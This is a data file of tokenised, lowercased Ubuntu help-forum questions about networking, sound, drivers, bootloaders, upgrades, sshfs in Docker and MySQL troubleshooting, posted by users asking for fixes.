364546	ip address configuration in ubuntu 12.10	1 ) i am unable to edit /etc/network/interfaces and /etc/resolv.conf file with vi editor . how can i access the file as a owner ? ! [ enter image description here ] [ 1 ] ip address 192.168.40.31 subnet mask 255.255.255.0 default gateway 192.168.40.1 preferred dns server 10.230.253.253 alternet dns server 203.147.88.2 2 ) this is my network settings in windows 7. i want to configure it in ubuntu 12.10. how can i do this ?
364551	how to insert a _single_ picture into a stream	how can i insert a single picture into a stream to be seen for a specific seconds ? there is abundant info in ffmpeg man , but i do not want to become a movie magician , just solve an urgent task . please drop me a sample command line . thanks .
364553	network printer `` print data error '' receives data but does not print ricoh/lanier ld520c	i 've been tearing my hair out trying to figure this out . i just tossed win8.1 because i could not make any hardware work , but it had similar symptoms . first i tried with ubuntu 12.04 32 bit then i tried linux mint cinnamon 15 64 bit both have the same symptoms . the printer appears to install just fine , drivers automatically selected , but test page fails to print . i can see the `` data in '' light flashing on the copier/printer but the display on the printer shows `` print data error '' and nothing prints . the printer requires an authorization code to print in color , but not in black and white , so i set the settings to black/white . i also tried putting in the color code with color or black/white printing to no avail . the printer does this same thing when another networked pc tries to print in color without the code . again there is no code needed for black/white . ping works fine , nmap shows it is compatible with a host of different formats including 21 ftp 23 telnet 80 http 139 netbios 514 shell 515 printer 631 ipp 7443 unknown 9100 jetdirect /usr/lib/cups/backend/snmp command shows : network socket : //192.168.1.201 `` lanier mp c2050/ld520c '' `` lanier mp c2050/ld520c '' `` mfg : lanier ; cmd : pjl , rcs , pcl , pclxl , pcl , pclxl ; mdl : mp c2050/ld520c ; sts:10001,0 ; cls : printer ; des : lanier mp c2050/ld520c ; '' `` '' lpinfo -v command shows the network socket address but no descriptor the printer is n't giving any feedback except `` print data error '' any help would be helpful . thanks ! -peter edit : i wanted to add that i tried the method which worked for another poster which was selecting the `` jetdirect '' option and specifying the ip address and that did not work either . i do not know how to capture the log file to attach here . i am a complete noob in linux but i can follow directions if adding that would help .
364558	no sound after installing 13.04 have tried everything	i have a fujitsu lifebook a-6120 . after installing raring ringtail i have no sound . not through the speakers or headphones . the built in microphone is working according to sound settings . also in sound settings it does list a built in output device . here 's what i have tried so far : my sound is not muted . i have checked the alsamixer to verify . i have removed and reinstalled alsa and pulseaudio . i have updated everything . i have gone into the /etc/modprobe.d/alsa-base.conf file and added the following line to the end : options snd-hda-intel model=fujitsu . i have also tried model=base and model=generic . my sound was working in windows 7 before i installed 13.04 , so it 's not a hardware issue . every forum seems to think that modifying the /etc/modprobe.d/alsa-base.conf file will fix the issue , so i have posted the contents of the file down here . i really appreciate any help on this issue . autoloader aliases install sound-slot-0 /sbin/modprobe snd-card-0 install sound-slot-1 /sbin/modprobe snd-card-1 install sound-slot-2 /sbin/modprobe snd-card-2 install sound-slot-3 /sbin/modprobe snd-card-3 install sound-slot-4 /sbin/modprobe snd-card-4 install sound-slot-5 /sbin/modprobe snd-card-5 install sound-slot-6 /sbin/modprobe snd-card-6 install sound-slot-7 /sbin/modprobe snd-card-7 cause optional modules to be loaded above generic modules install snd /sbin/modprobe -- ignore-install snd $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-ioctl32 ; /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # workaround at bug # 499695 ( reverted in ubuntu see lp # 319505 ) install snd-pcm /sbin/modprobe -- ignore-install snd-pcm $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-pcm-oss ; : ; } install snd-mixer /sbin/modprobe -- ignore-install snd-mixer $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-mixer-oss ; : ; } install snd-seq /sbin/modprobe -- ignore-install snd-seq $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; /sbin/modprobe -- quiet -- use-blacklist snd-seq-oss ; : ; } # install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } cause optional modules to be loaded above sound card driver modules install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } load saa7134-alsa instead of saa7134 ( which gets dragged in by it anyway ) install saa7134 /sbin/modprobe -- ignore-install saa7134 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist saa7134-alsa ; : ; } prevent abnormal drivers from grabbing index 0 options bt87x index=-2 options cx88_alsa index=-2 options saa7134-alsa index=-2 options snd-atiixp-modem index=-2 options snd-intel8x0m index=-2 options snd-via82xx-modem index=-2 options snd-usb-audio index=-2 options snd-usb-caiaq index=-2 options snd-usb-ua101 index=-2 options snd-usb-us122l index=-2 options snd-usb-usx2y index=-2 ubuntu # 62691 , enable mpu for snd-cmipci options snd-cmipci mpu_port=0x330 fm_port=0x388 keep snd-pcsp from being loaded as first soundcard options snd-pcsp index=-2 keep snd-usb-audio from beeing loaded as first soundcard options snd-usb-audio index=-2 options snd-hda-intel model=fujitsu
364560	dual boot ubuntu 12.04 with chromium os	i have taken a liking to using chromium os on a laptop , and wondering if i can dual boot chromium os on a computer already running ubuntu 12.04 . i 've looked around but cant find any guides or anything stating it being possible .
364563	how to resize lubuntu partition	i did read about resizing partition with gparted but it does n't work for me ... i have windowns 7 on a primary partition and lubuntu on extended , i mean on extended i have 'root ' partion and 'swap ' . i 've shortened windows partition on the primary partition and would like to lengthen my root on the extended partition . i run my bootable usb with lubuntu and run gparted ... and only i could do was changing partition i shortened ... i can not increase size of my lubuntu root partition ... i am planning totally delete windows partitions and use whole hd for lubuntu is there any easy way to make all my lubuntu as a primary and the only one partition on my hd ? ( of course did n't mention of swap ) .
364566	how to sync clipboard between ubuntu desktop and android phone ?	is there 's any way by which i can sync clipboard ubuntu 12.04/14.04 with android phone with jellybean 4.1.2 preferably over same wifi network or over internet if that 's not possible . in windows there 's a app called clipsync to sync clipboard b/w pc and android device . is there 's any app comparable to clipsync in windows or any other . even though android is linux based but have nothing much to do with ubuntu really . please help me out i have googled everywhere but did n't had anything close to it .
364567	ubuntu saycy boot up over 2 minutes	ok first of i am new on here so bear with me please : ) i did a fresh install of ubuntu 13.10 64bit over a previous windows 8 machine . everything was fine until i tried to install amd drivers for my hd7770 . i did a lot of research and reinstalls ; ) trying to get the most out of my graphics card . i stumbled across an answer on here ( 363125 ) and followed the instructions . voila ! ! my fglrx drivers installed and i was getting much better performance out of my graphics card . now the issue is it take over 2 minutes to boot up and i have some screen tearing when the unity desktop starts up ( flashing a black band across the bottom part of the screen ) . i have an i5 2500k processor and 8 gb mem on a 1 tb drive ( sata ) which is entirely dedicated to linux . please help - will provide all the info as requested . and thank you in advance .
364570	golang : sshfs -o reconnect fails when used inside docker container with `` reading directory . : input/output error ''	i am trying to mount a directory located on a host from a docker container using sshfs . the problem i am having is that once the golang app finishes executing the mountpoint disappears whereas it suppose to persist ( the same steps performed manually are producing persistent results . the ssh client code : package main import ( // '' bytes '' '' code.google.com/p/go.crypto/ssh '' // '' fmt '' '' io '' '' log '' '' os '' ) var ( server = `` 172.17.42.1:49155 '' username = `` root '' password = clientpassword ( `` orobix2013 '' ) ) type clientpassword string func ( p clientpassword ) password ( user string ) ( string , error ) { return string ( p ) , nil } type terminalmodes map [ uint8 ] uint32 const ( vintr = 1 vquit = 2 verase = 3 vkill = 4 veof = 5 veol = 6 veol2 = 7 vstart = 8 vstop = 9 vsusp = 10 vdsusp = 11 vreprint = 12 vwerase = 13 vlnext = 14 vflush = 15 vswtch = 16 vstatus = 17 vdiscard = 18 ignpar = 30 parmrk = 31 inpck = 32 istrip = 33 inlcr = 34 igncr = 35 icrnl = 36 iuclc = 37 ixon = 38 ixany = 39 ixoff = 40 imaxbel = 41 isig = 50 icanon = 51 xcase = 52 echo = 53 echoe = 54 echok = 55 echonl = 56 noflsh = 57 tostop = 58 iexten = 59 echoctl = 60 echoke = 61 pendin = 62 opost = 70 olcuc = 71 onlcr = 72 ocrnl = 73 onocr = 74 onlret = 75 cs7 = 90 cs8 = 91 parenb = 92 parodd = 93 tty_op_ispeed = 128 tty_op_ospeed = 129 ) func main ( ) { // an ssh client is represented with a slete ) . currently only // the `` password '' authentication method is supported . // // to authenticate with the remote server you must pass at least one // implementation of clientauth via the auth field in clientconfig . config : = & ssh.clientconfig { user : username , auth : [ ] ssh.clientauth { // clientauthpassword wraps a clientpassword implementation // in a type that implements clientauth . ssh.clientauthpassword ( password ) , } , } client , err : = ssh.dial ( `` tcp '' , `` 172.17.42.1:49155 '' , config ) if err ! = nil { panic ( `` failed to dial : `` + err.error ( ) ) } // each clientconn can support multiple interactive sessions , // represented by a session . defer client.close ( ) // create a session session , err : = client.newsession ( ) if err ! = nil { log.fatalf ( `` unable to create session : % s '' , err ) } defer session.close ( ) // set up terminal modes modes : = ssh.terminalmodes { echo : 0 , // disable echoing tty_op_ispeed : 14400 , // input speed = 14.4kbaud tty_op_ospeed : 14400 , // output speed = 14.4kbaud } // request pseudo terminal if err : = session.requestpty ( `` xterm '' , 80 , 40 , modes ) ; err ! = nil { log.fatalf ( `` request for pseudo terminal failed : % s '' , err ) } //var b bytes.buffer //session.stdout = & bi stdin , _ : = session.stdinpipe ( ) stdout , _ : = session.stdoutpipe ( ) go io.copy ( os.stdout , stdout ) go io.copy ( stdin , os.stdin ) //go io.copy ( os.stderr , stderr ) if err : = session.run ( `` /bin/bash -c \ '' sshfs piotr @ 172.17.42.1 : /home/piotr/helloworld/ /mnt -o idmap=user -o reconnect ; touch /mnt/ofoo\ '' '' ) ; err ! = nil { panic ( `` failed to run : `` + err.error ( ) ) } the container is running in the background ( -d ) and i ssh into it to confrim that the mountpoint ( /mnt/ ) is still there and this is what i am getting : root @ 654b8fa08b9e : ~ # mount none on / type aufs ( rw , relatime , si=77b99811b9d139a9 ) /dev/disk/by-uuid/7e1d6bab-b3f2-4ac3-8bff-0779f5bf40f2 on /etc/hostname type ext4 ( ro , relatime , errors=remount-ro , data=ordered ) /dev/disk/by-uuid/7e1d6bab-b3f2-4ac3-8bff-0779f5bf40f2 on /etc/hosts type ext4 ( ro , relatime , errors=remount-ro , data=ordered ) proc on /proc type proc ( rw , nosuid , nodev , noexec , relatime ) sysfs on /sys type sysfs ( rw , nosuid , nodev , noexec , relatime ) shm on /dev/shm type tmpfs ( rw , nosuid , nodev , noexec , relatime , size=65536k ) /dev/disk/by-uuid/7e1d6bab-b3f2-4ac3-8bff-0779f5bf40f2 on /.dockerinit type ext4 ( ro , relatime , errors=remount-ro , data=ordered ) /dev/disk/by-uuid/7e1d6bab-b3f2-4ac3-8bff-0779f5bf40f2 on /etc/resolv.conf type ext4 ( ro , relatime , errors=remount-ro , data=ordered ) devpts on /dev/tty1 type devpts ( rw , nosuid , noexec , relatime , gid=5 , mode=620 , ptmxmode=000 ) devpts on /dev/pts type devpts ( rw , relatime , mode=600 , ptmxmode=666 ) devpts on /dev/ptmx type devpts ( rw , relatime , mode=600 , ptmxmode=666 ) piotr @ 172.17.42.1 : /home/piotr/helloworld/ on /mnt type fuse.sshfs ( rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , max_read=65536 ) root @ 654b8fa08b9e : ~ # cd /mnt/ root @ 654b8fa08b9e : /mnt # ls ls : reading directory . : input/output error root @ 654b8fa08b9e : /mnt # the `` mount '' command shows that the mountpoint is there however when i am trying to access it i am getting : ls : reading directory . : input/output error can someone tell me how i can fix that please ? i spend quite a lot of time on this without success , any input is very welcome !
364573	problem with setting up multiboot iso usb using syslinux	i have followed this tutorial : http : //blog.jakgibb.com/2013/01/03/creating-a-multiboot-usb-stick-using-syslinux/ i want to boot linux live isos directly from usb drive using syslinux instead of method provied here : http : //www.pendrivelinux.com/boot-multiple-iso-from-usb-via-grub2-using-linux/ here is my syslinux.cfg : default vesamenu.c32 prompt 0 timeout 300 menu title geek usb menu background /bg.png menu tabmsg created by salman menu width 72 menu margin 10 menu vshift 3 menu hshift 6 menu rows 15 menu tabmsgrow 20 menu timeoutrow 22 menu color title 1 ; 36 ; 44 # 66a0ff # 00000000 none menu color hotsel 30 ; 47 # c00000 # dddddddd menu color sel 30 ; 47 # 000000 # ffffffff menu color border 30 ; 44 # d00000 # 00000000 std menu color scrollbar 30 ; 44 # dddddddd # 00000000 none label harddisk menu label continue to boot from ^first hd ( default ) kernel chain.c32 append hd1 menu default label my menu label ^my loopback loop /ubuntu-12.04.3-desktop-i386.iso linux ( loop ) /casper/vmlinuz boot=casper iso-scan/filename=/ubuntu-12.04.3-desktop-i386.iso noeject noprompt splash -- initrd ( loop ) /casper/initrd.lz label mix menu label ^mix insmod loopback insmod iso9660 set isofile= '' /ubuntu-12.04.3-desktop-i386.iso '' loopback loop $ isofile kernel ( loop ) /casper/vmlinuz append boot=casper initrd= ( loop ) /casper/initrd.lz splash -- label mix2 menu label ^mix2 set isofile= '' /ubuntu-12.04.3-desktop-i386.iso '' loopback loop $ isofile kernel ( loop ) /casper/vmlinuz append boot=casper live-media-path= ( loop ) /casper/ file= ( loop ) /preseed/ubuntu.seed initrd= ( loop ) /casper/initrd.lz splash -- label mix3 menu label ^mix3 loopback loop /ubuntu-12.04.3-desktop-i386.iso kernel ( loop ) /casper/vmlinuz append boot=casper live-media-path= ( loop ) /casper/ file= ( loop ) /preseed/ubuntu.seed initrd= ( loop ) /casper/initrd.lz splash -- my usb is booting and syslinux is working and boot menu ( syslinux.cfg ) is displaying fine but menus are not working , do n't know why ? no menu is booting ubuntu-12.04.3-desktop-i386.iso . the worst part is that no error is coming when i select a menu and hit enter , screen blinks and return to main menu . what is wrong with my code ?
364574	how can i run cinnamon 2.0 over nx	has anyone had any luck trying to run cinnamon 2.0 over nx ( freenx , nomachine , etc ) ? i have never been able to get any version of it working , and i was hoping that the 2.0 release would have the secret sauce in it . ==== update : i kinda , sorta got this working , a little bit . for my first try , i 'm trying to run the nx client for windows , and trying to establish a session on an ubuntu/cinnamon machine . if i set the client desktop to `` shadow '' , and i 'm logged into the ubuntu machine at the same time , i get a shared desktop . that 's not bad , but it 's really sluggish ( and performance is the whole point of nx ) . if i set the client desktop to `` unix/custom '' and tell it to run /usr/bin/cinnamon-session-cinnamon , i get a series of flashing windows telling me that cinnamon has crashed and that i 'm running in fallback mode , and do i want to restart . i have to kill the nx client to get out of that cycle . ( same story if i tell it to run/usr/bin/cinnamon-session as the custom program . running /usr/bin/gnome-session just sort of goes off into space . running the `` default x program '' brings up an x11-style window saying `` can not run /etc/x11/xdm/xsession '' . ( which makes sense , because i have no /etc/x11/xdm directory on the server . ) starting the console works . i get an xterm and i can start x-based programs ( web browsers and such ) properly . but still no desktop . ===== update 2 : i upgraded my nx client from 3.5.0-7 to 3.5.0-9 . not sure if that helped or not . on the server side , i went into /usr/nx/etc/node.cfg and changed defaultxsession to be /usr/bin/cinnamon-session-cinnamon . then i went into the client and set up the custom session to run the default x client script . now i get a connection , and it stays up , but i just have a black background , and no icons . i can right click and get the normal pop-up window , but i ca n't see anything else . if i change my defaultxsession to be /usr/bin/cinnamon-session , i get the `` cinnamon crashed , you 're in fallback mode , do you want to restart ? '' message . at least at that point , i can see some other things on the desktop ( desktop switcher , application and places drop-down menus , logout menu ) hmm , if i go to the advanced tab and say `` disable directdraw for screen rendering '' , i no longer get the crashes . ( wait ... that may just have been lucky . i 'm getting them sometimes . )
364577	network manager drops wifi and wo n't remember password	i just updated my ( k ) ubuntu 12.04 certified asus laptop to kubuntu 13.10 . now wifi drops at least every 10 minutes , and sometimes several times per minute . it 's a wireless-n network with wpa2-psk . it never dropped before the update . what 's more , network manager somehow does n't remember the wifi password , so i 'm forced to type it in every time the connection drops ( kde daemon pop-up ) . when i edit the connection however , the password is right there on the wireless security tab , so evidently it 's being kept somewhere . the connection is set to auto connect and usable by all users . i have tried deleting and re-adding it several times , to no avail . here 's my wifi hardware : *-network description : wireless interface product : rt5390 wireless 802.11n 1t/1r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : e0:06 : e6:09:0d:15 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.11.0-12-generic firmware=0.34 ip=192.168.1.3 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:52 memory : de800000-de80ffff thanks for your help !
364578	after install of kubuntu-full , no longer have access to unity login	i installed ubuntu 13.10 about a week ago . just today i went ahead and installed kubuntu-full to get kde and it 's associated programs . i want to keep the unity login screen though ( default when you install ubuntu ) . i ca n't seem to get this working . doing a 'sudo dpkg-reconfigure gdm ' or 'sudo dpkg-reconfigure lightdm ' and choosing either one of those does not get me there . if i choose gdm , i just end up with a gnome login screen . if i pick lightdm , i end up with a kde login screen . does n't seem to be an option for choosing the unity login screen ( whatever it 's called ) . any assistance ?
364579	nm-applett and sound-indicator in systray gone and sound not working after update 13.10	after upgrading my xubuntu 13.04 to 13.10 i have some problems : the networkmanager is not in the taskbar , i think that is the notifications-applet ( german : `` nachrichtenanzeige '' ) the sound-indicator-applett in the systray is gone i have no sound , that means , i still have sound if i start vlc with sudo mpg123 test.mp3 so it seems there is a right problem the systray problem : the systray 's notifications-applet is usually looking like this : or this : it is not working anymore . no audio-settings and no network-manager in the taskbar in xfce : there is just one small box with nothing in it . when i install stalonetray , there i see the status of wicd and all the other statuses , so the systray seems to be broken .
364580	unable to run executable from mounted flashdrive on chromebook	i recently got a chromebook and installed crouton on it so i can run ubuntu natively . since the machine only has 16gb of ssd i decided to get a tiny flash drive that i can keep in it at all times . the problem is that when i try to execute files that are in fact executable , they either do n't run ( using sudo ) or say permission denied ( sans sudo ) . i am testing using a simple hello world c program , which works if i execute it from the desktop . user @ localhost : ~/usb $ gcc -o hello hello.c user @ localhost : ~/usb $ ls -l total 32 -rwxr-xr-x 1 user user 7798 oct 23 11:38 hello -rwxr-xr-x 1 user user 114 oct 23 11:03 hello.c user @ localhost : ~/usb $ ./hello bash : ./hello : permission denied user @ localhost : ~/usb $ sudo ./hello [ sudo ] password for user : user @ localhost : ~/usb $
364582	ubuntu touch on non-brand name tablet ?	i have just gotten a non-name brand android table running 4.0.4 and the model number is a13-mid . curious as to if this non-brand tablet would be able to have the new ubuntu touch os that just came out ? and if so then would i just follow the basic instructions that has been up on the ubuntu website ? i 'm afraid since it 's not a nexus phone or tablet then i wo n't be able to do it .
364588	( how ) can x11 know my screen orientation pre-login ? ( ubuntu 12.10 )	problem : a laptop usually plugged into 2 external monitors , both rotated 90 degrees . at login time , the 3 displays are mirrored , and only the laptop itself is appropriately oriented . i 'd prefer to have the laptop screen closed , and be able to see what i 'm typing/control my mouse naturally during login . i 'd also prefer all desktop environments , and all user accounts to automatically get the same monitor configuration , not to have to set it individually within each account ( and presumably each windowing environment ) . on the other hand , if the laptop is n't docked , or is plugged into a projector , i 'd like to have a sane appearing screen , based on hardware detected - and have this once again apply even at the login screen . is this even possible ? if so , how do i do it ? while i 'm looking for the general answer , in this case i do n't have proprietary graphics drivers or the cards that require them . window managers potentially involved : just about anything . i presently have kde and fluxbox installed , but that 's subject to change . happy to read answers like `` this will work in my-fav-window-manager ; here 's how '' even if i 'm not currently running it . i consider my level of cluefulness about x11 to be very low ; general linux cluefulness fairly high . i.e . please do n't assume too many x related clues when replying ; - ) the following earlier question leaves me thinking the task is doable , but does n't tell me how : how can i configure the login screen to be displayed in portrait orientation ?
364589	how to turn on display port	i have thinkpad t430 with nvidia nvs 5400m and intel hd graphics 4000 . i installed the bumblebee and nvidia-current but ubuntu still does n't recognise external monitor connected displayport
364590	wkhtmltopdf displaying text as blocks	we 're using wkhtmltopdf in a web project ( nodejs/compoundjs ) . we 've gotten it working how we wanted on our machines ( using the -- use-xserver switch ) . however , when i try to run this on our ubuntu server 12.04 ( without the ubuntu-desktop package ) , the pdf can not use the switch . when we disable the switch , the pdf displays any characters as blocks ( image below ) . how do i resolve this without installing ubuntu-desktop and running x server ? i 've found liberation fonts , which installing ttf-liberation and fonts-liberation did not help . and urw-fonts , but i have yet to find an ubuntu equivalent . edit : it just hit me , this does n't matter if i 'm on the server or not . on my development machine ( ubuntu 13.04 desktop ) , i can run the following , which produces the same blocks : wkhtmltopdf http : //google.com google1.pdf while this prints out the pdf properly : wkhtmltopdf -- use-xserver http : //google.com google2.pdf my version of wkhtmltopdf is 0.12.0 .
364591	trouble updating to version 13.10 ( from version 13.04 )	by trying to update to version 13.10 ( german ) from version 13.04 i 'd received the following problem-message : w : fehlschlag beim holen von `` http : //de.archive.ubuntu.com/ubuntu/dists/natty-backports/main/source/sources 404 not found '' w : fehlschlag beim holen von `` http : //de.archive.ubuntu.com/ubuntu/dists/natty-backports/restricted/source/sources 404 not found '' w : fehlschlag beim holen von `` http : //de.archive.ubuntu.com/ubuntu/dists/natty-backports/universe/source/sources 404 not found '' w : fehlschlag beim holen von `` http : //de.archive.ubuntu.com/ubuntu/dists/natty-backports/multiverse/source/sources 404 not found '' e : einige indexdateien konnten nicht heruntergeladen werden . sie wurden ignoriert oder alte an ihrer stelle benutzt . update rolls back anyone got an solution ?
364594	has the appindicator or gtkmenu api changed in saucy ?	i 've written a custom application indicator , which is n't working properly on saucy . the menu is initialised with a few items , then updates regularly , adding or removing menu items . this worked fine < 13.10 , but on 13.10 , the line that adds the menu to the indicator produces the following warning : warning : /build/buildd/glib2.0-2.38.0/./gobject/gsignal.c:2475 : signal 'child-added ' is invalid for instance '0x24390e0 ' of type 'gtkmenu' self.ind.set_menu ( self.menu ) and the items added to the menu subsequently dont appear . a bug has been filed against several indicators for the same problem , but it 's not clear to me whether this is a problem with the indicators as a result of an api change , or a bug in the gtk or appindicator libraries . does anyone know ?
364595	how to switch between tabs in nautilus ?	in firefox or chromium i usectrl+tab ( or ctrl+shift+tab ) for this function .
364601	how can i install ubuntu in my hp pavilion g4 notebook ?	i have an hp pavilion g4 notebook . i have windows on it and am trying to dual boot . i have tried to install ubuntu on it . i tried to boot from cd , pen drive and even tried to do it by downloading ubuntu from online . i tried different versions of ubuntu ( 12.04 and 13.04 ) . i tried the boot helper in the cd as well . every time i try to boot and install ubuntu , my laptop hangs in the beginning after the ubuntu logo appears .
364602	large query never reaches mysql	i have a large query . if i run it on localhost it takes 0.01 seconds . if i try it from a remote connection it never runs at all . the general log shows the connection coming in , and then nothing else . never shows up in slow queries either . if i run show processlist it shows that there is a connection , but it is sleeping , and info is null . now if i run tcpdump ( tcpdump -i eth0 -s0 -a port 3306 ) the query shows up ... some settings from my.cnf key_buffer = 32m max_allowed_packet = 32m query_cache_limit = 1m query_cache_size = 16m innodb_buffer_pool_size = 32m innodb_log_file_size = 256m all of those are plenty big enough for the query . it has a in ( ) and includes about 400 id 's inside of that , but i ca n't run a in ( select ) as the table does n't exist on that db . the weirdest part is that it worked fine a couple of weeks ago . they only change i made to my.cnf was : innodb_support_xa = 0 innodb_flush_log_at_trx_commit = 0 ( but that just increased the speed of inserts by not logging until the end ) if i shorten the query , it runs . could it be something limiting in iptables ? i would imagine that it could n't accept a tcp packet greater than 1500 bytes . i am totally lost on this , and boxed in pretty good . any ideas ?
364603	ubuntu upstart : why does restart do the same thing as stop ?	this is my upstart file /etc/init/myapp.conf : description `` example of starting node with upstart and forever '' start on filesystem or runlevel [ 2345 ] stop on runlevel [ 06 ] expect fork console output setuid lwood env home=/home/lwood env log= '' /home/lwood/myapp/applog.log '' script cd $ home exec forever -a -l $ log \ start /home/lwood/myapp/app.js end script pre-stop script cd $ home exec forever stop /home/lwood/myapp/app.js > > $ log end script do you know why sudo restart myapp is only stopping the service ? it does not start the service after stopping it . so it has the same effect as sudo stop myapp . doing sudo stop myapp and then sudo start myapp works fine though . wondering why restarting behaves different . i 'm on ubuntu 12.04 .
364605	fixing failed upgrade to 13.10	when i start ubuntu after it froze during an upgrade to 13.10 , it says : filesystem check or mount failed . a maintenance shell will now be started . control-d will terminate this shell and continue booting after retrying filesystems . any further errors will be ignored . root @ netbook : ~ # when i use sudo apt-get update it eventually says : e : dpkg was interrupted , you must manually run `` sudo dpkg -- configure -a '' to correct the problem when i run that command , it says : dpkg : error : unable to access dpkg status area : read-only file system and then gives me the root prompt again . please help ! i 'm a very basic user of ubuntu .
364608	autokey not working in saucy	i have to become dependant on autokey phrases to insert all kind of repetitive data . it was working fine when i upgraded from to 13.10 without formatting . however , i wanted to get rid of the clutter and unused junk and made a clean âread formatting- install . after installation and reconfiguration of autokey it displays an odd but consistent behaviour . a ) saving a new modification hangs the program . the window goes grey and i have to close it by means of a terminal . b ) phrases configured to trigger without a key are not working . neither with a key trigger . c ) a trigger key to show the window does n't work . d ) the program is configured to start at login and show an icon on panel . neither function works . i 've installed and reinstalled both versions ( kde and gtk ) several times . none works ok. what really puzzles me is that it was working quite fine in saucy just prior to my reinstall . has anyone experienced anything like this ? i really need a macro expander . can anyone suggest an alternative ? thanks in advance ! edit : diving the net i 've found two things : 1 ) autokey is basically unusable with saucy -at least within unity- and ... 2 ) it seems to have ceased developement since a year and a half ago . thus , i need a replacement that works . any input to that effect much appreciated . anything that will insert my email or my access id to some sites will do . tia . edit # 2 : managed to get autokey kde working . how ? i 'm not truly sure . i installed it alongside autokey qt and it worked . in the process , it ( or maybe me ) managed to mess up a lot of my home folder permissions which i had to fix ( chmod -r ) manually . it also broke unity and lightdm which i had to restart from the command line . however , it 's been working fine since then . the only gripe is that i have n't managed to make it autostart at log-in but that 's minor . i 'm probably not pointing the correct command to the autostart roster . closing the question .
364610	how to install bilingual desktop on ubuntu 12.04	i have a question about how bilingualism works on ubuntu 12.04 . is it possible , without logging out , to switch another language ?
364619	fresh installation of ubuntu 12.04 lts 64 bits	i have ubuntu 12.04 lts 32 bits on my dell inspiron 1501 computer and i want to reinstall ( not upgrade ) the 64 bits version . i do n't know how to do that . wifi does n't work with my current version of ubuntu and i have heard that it could work with the 64 bits version .
364620	keyboard shortcut to snapping windows through monitors	i want to snap screens through multiple monitors , and keep the window attached to the edge , like in windows , when you press super + right to go from the right hand side of monitor 1 to the left hand side of monitor 2 . i have tried using the 'put ' settings in compiz , but they do n't work well when the screens are of different resolutions . below is an illustration of what i 'm trying to achieve : [ -- -- -- -- -|window| ] [ -- -- -- -- -- - ] -- -- > [ -- -- -- -- -- -- -- ] [ |window| -- -- -- -- ]
364621	`` third party sources disabled '' when upgrading , why ?	when i tried to upgrade to 13.10 , it was appearing on the screen while preparing to update third party sources disabled some third party entries in your sources.list were disabled . you can re-enable them after the upgrade with the 'software-properties ' tool or your package manager . after that it was on : w : failed to fetch bzip2 : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_saucy_universe_source_sources hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead .
364625	demo , promo , trial , prototype , 1st releases	how do i voluneer to test products like the edge , phablets , software , etc ? where do i sign up for an open invitation for anything new including hardware ?
364627	how can i install nvidia drivers ?	i have a laptop with ubuntu 13.10 gnome in it . gnome shell version is 3.10.1 . here 's what i got from running the following command : lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce 610m ] ( rev a1 ) . in the additional drivers pane , i have listed just my wifi card driver . how can i install nvidia drivers without bumblebee and via ppa ? i 'm really confused about this . i would like to install the 319.17 drivers , which are the stable version for my graphics card . i do n't know what to install ( nvidia , nvidia-current , nvidia graphic 319 , etc . ) could you tell me what i have to do to install nvidia 319,17 ( or just 319 ) via ppa and without bumblebee , please ! i tried going to system settings - > software & updates - > additional drivers to check for additional nvidia drivers , but there were n't any nvidia drivers in the list in the additional drivers tab . however when i checked in the ubuntu software center , there were several different nvidia packages there , as shown in this screenshot : http : //img22.imageshack.us/img22/6374/8w0l.png i have already tried to install the nvidia-319 package from the ubuntu software center , but after reboot ubuntu did not load correctly . i could only see the mark of ubuntu gnome and nothing else , the desktop or gnome shell did n't even load . i also could n't go to the login page . then i removed the nvidia-319 package , and now i have my system back . through all of this i have been using the default gdm package for the login screen display manager application . i still do n't know what nvidia package to install and how to get the proprietary nvidia graphics package to work on my system . please help i do n't know what to do . thanks in advance !
364628	where is my lock file ? mysql	below is my console out put i have no idea how to proceed with this , can anyone provide some direction ? apt-get install mysql-server reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libaio1 libdbd-mysql-perl libdbi-perl libhtml-template-perl libnet-daemon-perl libplrpc-perl mysql-client-5.5 mysql-server-5.5 mysql-server-core-5.5 suggested packages : libipc-sharedcache-perl libterm-readkey-perl tinyca the following new packages will be installed : libaio1 libdbd-mysql-perl libdbi-perl libhtml-template-perl libnet-daemon-perl libplrpc-perl mysql-client-5.5 mysql-server mysql-server-5.5 mysql-server-core-5.5 0 upgraded , 10 newly installed , 0 to remove and 0 not upgraded . e : could not get lock /var/cache/apt/archives/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/cache/apt/archives/
